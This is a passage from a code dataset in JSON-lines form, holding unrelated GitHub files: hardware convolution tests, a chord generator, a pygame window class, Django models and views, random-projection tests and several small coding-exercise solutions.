 30, 60), 10.), rand_full((4, 3, 5, 10), 20),\n stride=(7, 14)),\n \"batch1_outchannels1_inchannels1_kernel_smaller_stride\":\n ConvInput(rand_full((1, 1, 30, 60), 25.), rand_full((1, 1, 5, 10), 20),\n stride=(4, 8)),\n \"batch2_outchannels1_inchannels3_kernel_smaller_stride\":\n ConvInput(rand_full((2, 3, 30, 60), 10.), rand_full((1, 3, 5, 10), 20),\n stride=(4, 8)),\n \"batch2_outchannels4_inchannels3_kernel_smaller_stride\":\n ConvInput(rand_full((2, 3, 30, 60), 10.), rand_full((4, 3, 5, 10), 20),\n stride=(4, 8)),\n \"batch2_outchannels4_inchannels3_kernel_smaller_stride_bias\":\n ConvInput(rand_full((2, 3, 30, 60), 10.), rand_full((4, 3, 5, 10), 20),\n bias=torch.full((4,), 0.).requires_grad_(), stride=(4, 8))\n }\n\n\nclass TestConv2dHX(TestConv2d):\n \"\"\"\n Tests the conv2d operation on HX.\n \"\"\"\n conv = hxtorch.perceptron.conv2d\n\n @classmethod\n def setUpClass(cls):\n hxtorch.init_hardware()\n mock_parameter = hxtorch.perceptron.measure_mock_parameter()\n hxtorch.perceptron.set_mock_parameter(mock_parameter)\n cls.gain = mock_parameter.gain\n\n @classmethod\n def tearDownClass(cls):\n hxtorch.release_hardware()\n\n\nclass TestConv2dHXmock(TestConv2d):\n \"\"\"\n Tests the mocked conv2d operation.\n \"\"\"\n conv = partial(hxtorch.perceptron.conv2d, mock=True)\n\n @classmethod\n def setUpClass(cls):\n mock_parameter = hxtorch.perceptron.MockParameter()\n hxtorch.perceptron.set_mock_parameter(mock_parameter)\n cls.gain = mock_parameter.gain\n\n\ndel TestConv # remove abstract base class from tests\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"electronicvisions/hxtorch","sub_path":"tests/hw/test_perceptron_conv.py","file_name":"test_perceptron_conv.py","file_ext":"py","file_size_in_byte":9746,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"27"}
+{"seq_id":"32499717048","text":"__author__ = 'halley'\nimport random\nfrom constants import *\nimport music21helpers as mh\n\n#pick a chord progression that fits the given last chord\ndef chooseChords(num_chords, first_chord = [0,2,4], end_chords = [[0,2,4]]):\n chords = [first_chord]\n for i in range(1, num_chords - len(end_chords) - 1):\n next_chord = random.choice(chord_movements[chords[-1][0]])\n chords.append([next_chord + j for j in [0,2,4]])\n penultimate_chord_choices = chord_movements[chords[-1][0]]\n penultimate_chord_choices = list(filter(lambda i: end_chords[0][0] in chord_movements[i], penultimate_chord_choices)) # random.choice needs a sequence, not a filter object\n penultimate_choice = random.choice(penultimate_chord_choices)\n chords.append([penultimate_choice + j for j in [0,2,4]])\n chords.extend(end_chords)\n return chords\n\n\nchords = chooseChords(num_chords = 8, end_chords = [[4,6,8],[0,2,4]])\nprint(chords)\npits = [tuple(i) for i in chords]\ndurs = [2.0 for i in chords]\n\npart = mh.listsDegreesToPart(pits, durs)\n\npart.show()","repo_name":"HalleyYoung/AlgorithmicMusic-Latest","sub_path":"chordchoices.py","file_name":"chordchoices.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"41595928019","text":"from .utils import *\n\n\nclass Window:\n def __init__(self, screen, titre=\"\", version=1.0, pos=(0, 0), size=(0, 0), couleur=(20, 20, 20),\n contour_couleur=BLACK, couleur_barre=GREY, movable=True, fullscreen=False,\n cote_c=EPAISSEUR_BARRE // 2):\n self.screen = screen\n self.movable = movable\n self.fullscreen = fullscreen\n self.couleur_barre = couleur_barre\n self.wscreen, self.hscreen = 
self.screen.get_size()\n self.titre = titre\n self.version = version\n self.fen_name = \"[\" + self.titre + \"]\" + \" \" + str(self.version)\n self.pos = Point(*pos)\n self.size = Point(*size)\n self.couleur = couleur\n self.cote_c = cote_c\n self.state = WStates.ACTIVE\n self.escape_btn = (\n self.size.x - (EPAISSEUR_BARRE - self.cote_c) // 2 - self.cote_c,\n (EPAISSEUR_BARRE - self.cote_c) // 2,\n self.cote_c,\n self.cote_c\n )\n self._content = pygame.Surface(tuple(self.size))\n self.clic_on_barre = False\n\n self._contour = pygame.Surface((self.size.x + 4, self.size.y + 4 + EPAISSEUR_BARRE))\n pygame.draw.rect(self._contour, contour_couleur, (0, 0) + self._contour.get_size())\n\n self.id = None\n\n self._blurw = pygame.Surface(tuple(self.size))\n self._blurw.fill(WHITE)\n self._blurw.convert_alpha()\n self._blurw.set_alpha(225)\n\n self.widgets = []\n\n def update_user(self):\n pass\n\n def update(self):\n for wid in self.widgets:\n wid.update()\n self.update_user()\n\n def draw_vitals(self):\n # contour\n self.screen.blit(self._contour, (self.pos.x - 2, self.pos.y - 2))\n # barre\n pygame.draw.rect(self.screen, self.couleur_barre, tuple(self.pos) + (self.size.x, EPAISSEUR_BARRE))\n # titre\n self.screen.blit(font.render(self.fen_name, 1, BLACK), (self.pos.x + 2, self.pos.y + 2))\n # croix\n pygame.draw.rect(self.screen, RED, (self.escape_btn[0] + self.pos.x, self.escape_btn[1] + self.pos.y) + self.escape_btn[2:])\n\n def draw_content(self):\n # fond\n pygame.draw.rect(self._content, self.couleur, (0, 0) + tuple(self.size))\n\n def draw(self):\n if self.alive():\n if not self.fullscreen:\n self.draw_vitals()\n self.draw_content()\n for wid in self.widgets:\n wid.draw()\n if self.state == WStates.NOT_RESPONDING:\n self._content.blit(self._blurw, (0, 0))\n self.screen.blit(self._content, (self.pos.x, self.pos.y + EPAISSEUR_BARRE if not self.fullscreen else self.pos.y))\n\n def set_alive(self, value=WStates.ACTIVE):\n self.state = value\n\n def alive(self):\n return self.state != WStates.UNACTIVE\n\n def get_title(self):\n return self.fen_name\n\n def move(self, xd, yd):\n self.pos = Point(self.pos.x + xd, self.pos.y + yd)\n self.escape_btn = (\n self.size.x - (EPAISSEUR_BARRE - self.cote_c) // 2 - self.cote_c,\n (EPAISSEUR_BARRE - self.cote_c) // 2,\n self.cote_c,\n self.cote_c\n )\n\n def trigger_vitals(self, event):\n if event.type == MOUSEBUTTONDOWN:\n x, y = event.pos\n if 0 <= x <= self.size.x and 0 <= y <= EPAISSEUR_BARRE:\n self.clic_on_barre = True\n if event.type == MOUSEMOTION:\n if self.clic_on_barre:\n if self.movable:\n x, y = event.rel\n self.move(x, y)\n if event.type == MOUSEBUTTONUP:\n self.clic_on_barre = False\n x, y = event.pos\n if not self.fullscreen and self.escape_btn[0] <= x <= self.escape_btn[0] + self.escape_btn[2] \\\n and self.escape_btn[1] <= y <= self.escape_btn[1] + self.escape_btn[3]:\n self.state = WStates.UNACTIVE\n\n def trigger_user(self, event):\n pass\n\n def trigger(self, event):\n self.trigger_vitals(event)\n self.trigger_user(event)\n if event.type in (MOUSEBUTTONUP, MOUSEMOTION, MOUSEBUTTONDOWN):\n event.pos = (event.pos[0], event.pos[1] - EPAISSEUR_BARRE)\n for wid in self.widgets:\n wid.trigger(event)\n","repo_name":"BunkerOS/OS","sub_path":"system/window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":4308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"28031212870","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\nletters = 
'abcdefghijklmnopqrstuvwxyz'\nletter_pos = { letters[i]: i for i in range(len(letters)) }\n\n# Complete the designerPdfViewer function below.\ndef designerPdfViewer(h, word):\n \n print(letter_pos)\n max_height = h[letter_pos[word[0]]]\n for ind in range(1, len(word)):\n cur_letter = word[ind]\n cur_height = h[letter_pos[cur_letter]]\n if cur_height > max_height:\n max_height = cur_height\n \n return len(word)*max_height\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n h = list(map(int, input().rstrip().split()))\n\n word = input()\n\n result = designerPdfViewer(h, word)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n\n","repo_name":"ekukura/hackkerrank","sub_path":"_algorithms/implementation/designer-pdf-viewer.py","file_name":"designer-pdf-viewer.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"18313985907","text":"import numpy as np\nimport pytest\nimport random\nimport math\n\nfrom random_projection import projection_between, random_projection\n\n\ndef random_vector(sign: int = 1, dim=0, num_dims=1000):\n vect = np.random.random_sample(size=num_dims) - 0.5\n vect /= np.linalg.norm(vect)\n vect[dim] *= sign\n return vect\n\n\ndef assert_projection_bisects(projection, vect1, vect2):\n dot1 = np.dot(vect1, projection)\n dot2 = np.dot(vect2, projection)\n if dot1 > 0:\n assert dot2 < 0\n elif dot1 < 0:\n assert dot2 > 0\n else:\n assert False, \"Both cant be 0\"\n\n\ndef vect_radians_from(vect1, vect2):\n # cross_prod = np.cross(vect1, vect2)\n # angle = np.arctan2(cross_prod, np.dot(vect1, vect2))\n angle = np.arccos(np.dot(vect1, vect2))\n return angle\n # import pdb; pdb.set_trace()\n # return np.arccos(dotted)\n\n\ndef test_random_projections_theta_uniform_dist():\n # np.random.seed(0)\n print()\n hist_size = 30\n hist_angle = np.zeros(hist_size)\n hist_dot = np.zeros(hist_size)\n for i in range(0, 1000):\n vect1 = random_vector(sign=1, num_dims=3)\n vect2 = random_vector(sign=1, num_dims=3)\n\n query_vect = random_projection(vect1, vect2, 0)\n vect = random_projection(vect1, vect2, 0)\n radians = vect_radians_from(query_vect, vect)\n bucket_angle = (radians / math.pi) * hist_size\n assert radians <= math.pi\n bucket_dot = ((np.dot(vect1, vect2) + 1) / 2) * hist_size\n hist_angle[int(bucket_angle)] += 1\n hist_dot[int(bucket_dot)] += 1\n print(\"Dot product distribution\")\n for row in hist_dot:\n if int(row) == 0:\n print(\"0\")\n else:\n print(\"+\", end=\"\")\n print(\"*\" * int(row))\n print(\"---------------\")\n print(\"Angle distribution\")\n for row in hist_angle:\n if int(row) == 0:\n print(\"0\")\n else:\n print(\"+\", end=\"\")\n print(\"*\" * int(row))\n\n\ndef test_projection_between_has_negatives():\n np.random.seed(0)\n vect1 = random_vector(sign=1)\n vect2 = random_vector(sign=1)\n projection = projection_between(vect1, vect2)\n negs = projection[projection < 0]\n assert len(negs) > 400 # seed dependent\n\n\ndef test_projection_random_positive():\n for i in range(0, 100):\n vect1 = random_vector(sign=1)\n vect2 = random_vector(sign=1)\n projection = projection_between(vect1, vect2)\n assert_projection_bisects(projection, vect1, vect2)\n\n\ndef test_projection_random_negative():\n for i in range(0, 100):\n vect1 = random_vector(sign=-1)\n vect2 = random_vector(sign=-1)\n projection = projection_between(vect1, vect2)\n assert_projection_bisects(projection, vect1, vect2)\n\n\ndef test_projection_random_pos_neg():\n for i in 
range(0, 100):\n vect1 = random_vector(sign=1)\n vect2 = random_vector(sign=-1)\n projection = projection_between(vect1, vect2)\n assert_projection_bisects(projection, vect1, vect2)\n\n\ndef test_projection_random_neg_pos():\n for i in range(0, 100):\n vect1 = random_vector(sign=-1)\n vect2 = random_vector(sign=1)\n projection = projection_between(vect1, vect2)\n assert_projection_bisects(projection, vect1, vect2)\n\n\ndef test_projection_zeros_dim():\n vect1 = random_vector(sign=0)\n vect2 = random_vector(sign=1)\n with pytest.raises(ValueError):\n vect1 = random_vector(sign=0)\n vect2 = random_vector(sign=1)\n projection_between(vect1, vect2)\n\n with pytest.raises(ValueError):\n vect1 = random_vector(sign=1)\n vect2 = random_vector(sign=0)\n projection_between(vect1, vect2)\n\n\ndef test_projection_specify_dim():\n vect1 = random_vector(sign=1, dim=5)\n vect2 = random_vector(sign=-1, dim=5)\n projection = projection_between(vect1, vect2, dim=5)\n assert_projection_bisects(projection, vect1, vect2)\n\n\ndef test_projection_random_specify_dim():\n for i in range(0, 100):\n vect1 = random_vector(sign=1, dim=5)\n vect2 = random_vector(sign=1, dim=5)\n projection = projection_between(vect1, vect2, dim=5)\n assert_projection_bisects(projection, vect1, vect2)\n\n\ndef test_bad_case_due_to_not_using_custom_dims_correctly():\n random.seed(0)\n np.random.seed(0)\n\n vect1 = np.array([0.1487126, 0.683811, 0.27932906, -0.65746662])\n vect2 = np.array([0.55509923, 0.0941192, 0.68748675, 0.45865933])\n dim = 2\n projection = projection_between(vect1, vect2, dim=dim)\n assert_projection_bisects(projection, vect1, vect2)\n\n\ndef test_bad_case_due_to_identical_vectors():\n vect1 = np.array([0.58090311, 0.08887496, 0.76123888, -0.27416818])\n vect2 = np.array([0.58090311, 0.08887496, 0.76123888, -0.27416818])\n dim = 0\n with pytest.raises(ValueError):\n projection_between(vect1, vect2, dim=dim)\n","repo_name":"softwaredoug/passages","sub_path":"tests/test_random_projection.py","file_name":"test_random_projection.py","file_ext":"py","file_size_in_byte":4854,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"27"} +{"seq_id":"38964101858","text":"from django.db import models\nfrom django.contrib.auth.models import User\n\n# Create your models here.\nclass Post(models.Model):\n # for Post Table in db\n user=models.ForeignKey(User,on_delete=models.CASCADE) #user who posts th Post\n caption= models.CharField(max_length=200)\n image = models.ImageField(upload_to=\"Posts\")\n date=models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return str(self.user)+\" \"+str(self.date)\n\nclass Profile(models.Model):\n # for Profile Table for profile pages in db\n user=models.ForeignKey(User,on_delete=models.CASCADE) #user who created the profile\n displayPicture=models.ImageField(upload_to=\"Profiles\", default=\"default/default-user-icon.jpg\")\n bio=models.CharField(max_length=200, blank=True)\n followers=models.IntegerField(default=0)\n following=models.IntegerField(default=0)\n\n def __str__(self):\n return str(self.user)\n\nclass Like(models.Model):\n user = models.ManyToManyField(User, related_name=\"liking_user\")\n post = models.OneToOneField(Post, on_delete=models.CASCADE) # class methods are much like static methods , can be accessed by class name as well as object name \n #the class method is always attached to a class with first argument as the class itself cls.\n\n # for liking post\n @classmethod\n def like(cls, post, likingUser):\n #instead of self we 
use cls\n obj, create = cls.objects.get_or_create(post = post)\n obj.user.add(likingUser)\n\n # for disliking post\n @classmethod\n def dislike(cls, post, dislikingUser):\n obj, create = cls.objects.get_or_create(post = post) # if an object exists returns(object,false), else creates an object and returns (object,True)\n \n obj.user.remove(dislikingUser)\n\n def __str__(self):\n return str(self.post)\n\n\n","repo_name":"Varshney200/WebSocial","sub_path":"userfeed/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"24622240431","text":"\nimport re\nfrom logging import getLogger\n\n'''\nThe model is intended to be, as far as reasonable, self-describing.\nIn other words, clients are expected to be able to display the model even if the order of the data changes,\nor if entries are added or removed.\nExceptions to the above should be keyed on tag attributes (see below).\nThe 'low-level' details (eg attribute names) of the model should not change.\n\nThe model is hierarchical, modelled as a tree.\nSo the outermost list is the 'root' and each entry is a 'node'.\nNon-leaf nodes, including the root, are lists.\nLeaf nodes are dicts / maps and represent individual 'values'.\n\nWithin a non-leaf node, the first child node is a 'text' type node (see below) that acts as a 'title' \ndescribing the contents of the node.\n\nAll leaf nodes have a 'type' attribute which describes the type of the node.\nThe contents of a node of a given type match the constructor functions below.\nAll leaf nodes have a 'value' attribute.\nAll leaf nodes have a 'tag' attribute that is intended as a machine-readable semantic marker (so where the client \nneeds exceptional processing I will try to maintain these even if the text of a node changes, for example).\n'''\n\n\nCOMPARE_LINKS = 'compare-links'\n\n# diary and general\nDB = 'db'\nDP = 'dp'\nEDIT = 'edit'\nFLOAT = 'float'\nHI = 'hi'\nIMAGE = 'image'\nINTEGER = 'integer'\nLABEL = 'label'\nLINK = 'link'\nLO = 'lo'\nMAP = 'map'\nMEASURES = 'measures'\nTAG = 'tag'\nSCHEDULES = 'schedules'\nSCORE = 'score'\nTEXT = 'text'\nTYPE = 'type'\nUNITS = 'units'\nVALUE = 'value'\n\n\nlog = getLogger(__name__)\n\n\ndef from_field(topic_field, statistic_journal):\n kargs = dict(topic_field.model)\n type = kargs[TYPE]\n del kargs[TYPE]\n kargs.update(value=statistic_journal.value,\n label=statistic_journal.statistic_name.title,\n db=statistic_journal)\n if statistic_journal.statistic_name.units:\n kargs.update(units=statistic_journal.statistic_name.units)\n return {SCORE: score, INTEGER: integer, FLOAT: float, EDIT: edit}[type](**kargs)\n\n\ndef to_tag(text):\n text = re.sub(r'\\W+', '-', text)\n text = re.sub(r'-?(\\w+(:?-\\w+)*)-?', r'\\1', text)\n return text.lower()\n\n\n# --- mutable types\n\ndef score(label, value, db=None):\n if db is None: log.warning(f'No db for score {label}/{value}')\n return {TYPE: SCORE, LABEL: label, VALUE: value, DB: db}\n\n\ndef integer(label, value, units=None, lo=None, hi=None, db=None):\n if db is None: log.warning(f'No db for integer {label}/{value}')\n return {TYPE: INTEGER, LABEL: label, VALUE: value, UNITS: units, LO: lo, HI: hi, DB: db}\n\n\ndef float(label, value, units=None, lo=None, hi=None, dp=1, db=None):\n if db is None: log.warning(f'No db for float {label}/{value}')\n return {TYPE: FLOAT, LABEL: label, VALUE: value, UNITS: units, LO: lo, HI: hi, DP: dp, DB: db}\n\n\ndef edit(label, value, db=None):\n if db is 
None: log.warning(f'No db for edit {label}/{value}')\n return {TYPE: EDIT, LABEL: label, VALUE: value, DB: db}\n\n\n# --- immutable types\n\ndef text(value, tag=None, db=None):\n text = {TYPE: TEXT, VALUE: value, TAG: to_tag(tag or value)}\n if db: text[DB] = db\n return text\n\n\ndef value(label, value, tag=None, units=None, measures=None):\n return {TYPE: VALUE, LABEL: label, VALUE: value, TAG: to_tag(tag or label), UNITS: units, MEASURES: measures}\n\n\ndef measures(schedules):\n # schedules are a map from schedule to (percent, rank) tuples\n return {TYPE: MEASURES, SCHEDULES: schedules}\n\n\ndef link(value, db=None, tag=None):\n if not isinstance(db, tuple): log.warning(f'Bad db for link {value}')\n return {TYPE: LINK, VALUE: value, TAG: to_tag(tag or value), DB: db}\n\n\ndef image(value, tag=None):\n return {TYPE: IMAGE, VALUE: value, TAG: to_tag(tag or value)}\n\n\ndef map(xloyloxhiyhi, db):\n return {TYPE: MAP, VALUE: xloyloxhiyhi, DB: db}\n\n\n# --- decorators\n\ndef optional_text(name, tag=None):\n def decorator(f):\n def decorated(*args, **kargs):\n first = True\n for value in f(*args, **kargs):\n if first:\n yield text(name, tag=tag)\n first = False\n yield value\n return decorated\n return decorator\n\n\ndef trim_no_stats(f):\n\n def decorated(*args, **kargs):\n result = list(f(*args, **kargs))\n\n def trim(model):\n if isinstance(model, list):\n head, rest = model[0:1], model[1:]\n rest = [x for x in [trim(entry) for entry in rest] if x]\n if rest:\n return head + rest\n else:\n return []\n else:\n return model\n return trim(result)\n\n return decorated\n","repo_name":"andrewcooke/choochoo","sub_path":"py/ch2/diary/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4705,"program_lang":"python","lang":"en","doc_type":"code","stars":234,"dataset":"github-code","pt":"27"} +{"seq_id":"34394507499","text":"# pip install pdfminer.six\nfrom pdfminer.high_level import extract_text,extract_pages\nfrom pdfminer.layout import LTTextContainer\nimport os\nimport locale\nfrom openpyxl import load_workbook, Workbook\nfrom openpyxl.utils import get_column_letter\n\n# colocar o nome da empresa e cnpj para salvar txt ou excel\n# criar funcao para salvar o txt ou excel\n\n\n\nPASTA = 'rendimentos'\nPLAN = 'planilhas'\n\n\ndef autosize(ws):\n for i in range(1, ws.max_column+1):\n ws.column_dimensions[get_column_letter(i)].bestFit = True\n\n\ndef formata_numero(ws, intervalo):\n columns = ws[intervalo]\n\n for rows in columns:\n for cell in rows:\n cell.number_format = '#,##0.00'\n\n\ndef criar_plan(nome_arquivo):\n wb = Workbook()\n wb.save('planilhas' + os.sep + nome_arquivo)\n\n\ndef salvar_dados_plan(nome_arquivo, lista):\n wb = load_workbook('planilhas' + os.sep + nome_arquivo)\n ws = wb.active\n ws.title = 'Rendimentos'\n ws.append(['NONE', 'CPF', 'RENDIMENTOS'])\n for li in lista:\n \n ws.append(li)\n\n formata_numero(ws, 'C1:D10000')\n # formata_numero(ws, 'W:Z')\n \n ws.column_dimensions['A'].width = 30\n ws.column_dimensions['B'].width = 15\n ws.column_dimensions['C'].width = 15\n \n\n wb.save('planilhas' + os.sep + nome_arquivo)\n\n\n\nclass Funcionario:\n def __init__(self):\n self.nome = ''\n self.CPF = ''\n self.rendimentos = 0.0\n \n def add_nome(self, nome):\n self.nome = nome.replace('\\n', '')\n\n def add_CPF(self, CPF):\n self.CPF = CPF.replace('\\n', '')\n\n def add_rendimentos(self, rendimentos):\n self.rendimentos = rendimentos.replace('\\n', '')\n\n\ndef compara_textos(texto_previo, texto_arquivo, excecao=False):\n \n if texto_previo.upper() == 
texto_arquivo.replace('\\n', '').upper():\n return True\n\n\n return False\n\n\ndef remover_txt():\n for txt in os.listdir(PASTA):\n nome, extensao = os.path.splitext(txt)\n \n if extensao == '.txt':\n os.remove(PASTA + os.sep + txt)\n\nachou_nome = False\n\ndef gerar_rendimentos_funcionarios():\n\n for rendimento in os.listdir(PASTA):\n achou_nome = False\n # # Imprimir todo o texto contido em um PDF\n nome, extensao = os.path.splitext(rendimento)\n \n if extensao == '.pdf':\n caminho_pdf = PASTA + os.sep + rendimento\n text = extract_text(caminho_pdf)\n # print(text)\n # if 'Mexico' in text:\n # print('Estamos no PDF historias.pdf')\n\n # # Salvar texto do PDF para um arquivo de texto\n arquivo_texto = PASTA + os.sep + rendimento.replace('.pdf', '.txt')\n with open(arquivo_texto,'w') as file:\n file.write(text)\n\n with open(arquivo_texto, 'r') as arquivo:\n lista = arquivo.readlines()\n # print(lista)\n # registros = [registro for registro in lista if registro.replace('\\n', '').upper() == 'Nome completo'.upper()]\n linha = 0\n lista_funcionarios = []\n # for registro in lista:\n funcionario = False\n for i in range(len(lista)):\n if compara_textos('nome empresarial', lista[i]) and not achou_nome:\n nome_arquivo = lista[i + 1].replace('\\n','')\n nome_arquivo = nome_arquivo + '.xlsx'\n achou_nome = True\n if compara_textos('comprovante de rendimentos pagos e de', lista[i]):\n # print(lista[i])\n novo_funcionario = Funcionario()\n funcionario = True\n linha += 1\n if funcionario:\n if compara_textos('nome completo', lista[i]):\n novo_funcionario.add_nome(lista[i + 1])\n if compara_textos('CPF', lista[i]):\n novo_funcionario.add_CPF(lista[i + 5])\n if compara_textos('valores em reais', lista[i]):\n if lista[i + 1] != '\\n':\n novo_funcionario.add_rendimentos(lista[i + 1])\n \n else:\n novo_funcionario.add_rendimentos(lista[i + 2])\n\n lista_funcionarios.append(novo_funcionario)\n funcionario = False\n \n lista_informacoes = []\n for funcionario in lista_funcionarios:\n\n valor_em_reais = float(funcionario.rendimentos.replace('.', '').replace(',','.'))\n if valor_em_reais > 28559.70:\n lista_informacoes.append([funcionario.nome, funcionario.CPF, valor_em_reais])\n # print(f'{funcionario.nome} | {funcionario.CPF} | {funcionario.rendimentos}')\n\n\n criar_plan(nome_arquivo)\n salvar_dados_plan(nome_arquivo, lista_informacoes)\n\n \n\nif __name__ == '__main__':\n try:\n os.mkdir('planilhas')\n except:\n for arquivo in os.listdir('planilhas'):\n os.remove('planilhas' + os.sep + arquivo)\n\n gerar_rendimentos_funcionarios()\n remover_txt()\n\n print('finalizado com sucesso')\n os.system('pause')","repo_name":"diogoheck/ler_pdf_rendimentos_IR","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5209,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"23083748728","text":"from django.shortcuts import render, redirect\nfrom content.models import ContentModel, Comment\nfrom user.models import UserModel\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponse\nimport ast\nimport requests\nimport json\n\n\n\n# Create your views here.\n\ndef home(request):\n user = request.user.is_authenticated\n #HOEM이라는 함수를 실행시키는 것 만으로도 사용자가 로그인 되어있는지 안되있는지 알 수있음\n if user: #이 사용자가 있으면\n return redirect('/main')\n else:\n return redirect('/sign-in')\n\n\ndef main(request): #get 방식만\n if request.method =='GET':\n user = request.user.is_authenticated\n if user:\n all_content = 
ContentModel.objects.all()\n return render(request, 'main/main.html', {'contents':all_content})\n else:\n return redirect('/sign-in')\n\n\n@login_required()\ndef content_view(request, pk): # = urls.py\n content = ContentModel.objects.get(pk=pk)\n user = UserModel.objects.get(username=request.user)\n similar_list = []\n for similar in content.get_video_similar():\n similar_content = ContentModel.objects.filter(videoURL=f'https://www.youtube.com/embed/{similar}')\n similar_list.extend(list(similar_content))\n content.video_similar = similar_list\n\n\n all_comment = Comment.objects.filter(content=content).order_by('-created_at') # 여기 중요\n wish_list = user.wishList\n if content in wish_list.all():\n is_wished = True\n else:\n is_wished = False\n\n comment_list = []\n for comment in all_comment:\n is_like = comment.likes.filter(id=request.user.id).exists()\n comment_data = (comment, is_like)\n comment_list.append(comment_data) # [(comment, is_like), (comment, is_like)....].......\n return render(request, 'main/content.html', {\"content\": content, \"comments\": all_comment, \"is_wished\": is_wished,\n \"comment_list\": comment_list}) # \"is_like\": is_like \"comments\"딕셔와 content.html에 for문 일치\n\n\n\n@login_required()\ndef write_comment(request, pk):\n if request.method == 'POST':\n comment = request.POST.get('comment_box', '')\n current_content = ContentModel.objects.get(pk=pk)\n\n ContentCommnet = Comment()\n ContentCommnet.user = request.user\n ContentCommnet.description = comment\n ContentCommnet.content = current_content\n ContentCommnet.save()\n\n return redirect('/content/' + str(pk))\n\n@login_required()\ndef delete_comment(request, pk):\n comment = Comment.objects.get(pk=pk)\n current_content = comment.content.id\n comment.delete()\n\n return redirect('/content/' + str(current_content))\n\n@login_required()\ndef like(request, comment_pk, content_pk):\n if request.method =='POST':\n ContentModel.objects.get(pk=content_pk) # ?????....\n comment = Comment.objects.get(pk=comment_pk)\n print(comment.likes.filter(username=request.user))\n if comment.likes.filter(username=request.user).exists():\n comment.likes.remove(request.user)\n comment.like_count -= 1\n comment.save()\n else:\n comment.likes.add(request.user)\n comment.like_count += 1\n comment.save()\n\n return redirect('/content/'+ str(content_pk))\n","repo_name":"Paige1996/Honflix","sub_path":"content/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3391,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"22223123578","text":"import random\nimport os\n\ninit_str = '''\n \\ | /\n- RT - Thread Operating System\n / | \\ 3.1.1 build Nov 19 2018\n 2006 - 2018 Copyright by rt-thread team\nmsh >\n'''\n\nfilename = str(input(\"请输入需要操作的文件:\"))\n\nfilesize = 0\nif (os.path.exists(filename)):\n filesize = os.path.getsize(filename)\nif (filesize == 0):\n fd = open(filename, 'a')\n fd.write(init_str)\n fd.close()\nelse :\n fd = open(filename)\n # read log content\n print(\"read log content:\")\n print(fd.read())\n fd.close()\n\nfd = open(filename, 'a')\n# write random log\nfor i in range(random.randint(0, 100)):\n fd.write(\"[task] adapter volt:\" + str(random.randint(0, 100)) + '.' 
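`content/views.py` above toggles a comment like by checking `likes.filter(...).exists()` and then incrementing or decrementing a cached `like_count`. A sketch of the same toggle factored into one helper; `comment.likes` is assumed to be the ManyToMany relation to the user model, as in the source, and the count is re-derived from the relation so the cached field cannot drift:

```python
def toggle_like(comment, user):
    # Remove the like if present, add it otherwise; return the new state.
    if comment.likes.filter(pk=user.pk).exists():
        comment.likes.remove(user)
        liked = False
    else:
        comment.likes.add(user)
        liked = True
    comment.like_count = comment.likes.count()   # recompute the cached counter
    comment.save(update_fields=['like_count'])
    return liked
```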
+ str(random.randint(0, 10)) + 'v')\n fd.write(\"\\n\")\nfd.close()","repo_name":"i-jaffer/log_prase_system","sub_path":"log_generate.py","file_name":"log_generate.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"40604673674","text":"list = input().split()\n\nd = {}\nfor s in list:\n\n if s in d:\n d[s] += 1\n else:\n d[s] = 1\n\nflg = False\nfor v in d.values():\n\n if v == 3 or v == 2:\n continue\n\n flg = True\n print(\"No\")\n break\n\nif flg is False:\n print(\"Yes\")\n","repo_name":"S-guchi/at-coder","sub_path":"abc263/a/answer.py","file_name":"answer.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"243727986","text":"class Solution(object):\n def maximumProduct(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n nums.sort()\n\n return max(nums[-1]*nums[-2]*nums[-3],nums[-1]*nums[0]*nums[1])\n\nclass Solution(object):\n def maximumProduct(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n min1 = float('inf')\n min2 = float('inf')\n max1 = float('-inf')\n max2 = float('-inf')\n max3 = float('-inf')\n for n in nums:\n if n <= min1:\n min2 = min1\n min1 = n\n elif n <= min2: # n lies between min1 and min2\n min2 = n\n if n >= max1: # n is greater than max1, max2 and max3\n max3 = max2\n max2 = max1\n max1 = n\n elif n >= max2: # n lies betweeen max1 and max2\n max3 = max2;\n max2 = n\n elif n >= max3: # n lies betwen max2 and max3\n max3 = n\n\n\n return max(min1 * min2 * max1, max1 * max2 * max3)\n \n","repo_name":"lizyang95/leetcode","sub_path":"leetcode2/maximumProduct.py","file_name":"maximumProduct.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"36900312333","text":"import dash\nfrom dash import dcc\nfrom dash import html\nimport pandas as pd\n\nchoices=['Comparison of Models',\n'Final Model Metrics',\n'ROC-AUC',\n'Confusion Matrix',\n'Feature Importance']\n\ntab_3_layout = html.Div([\n html.H3('Model Evaluation Statistics'),\n html.Div([\n 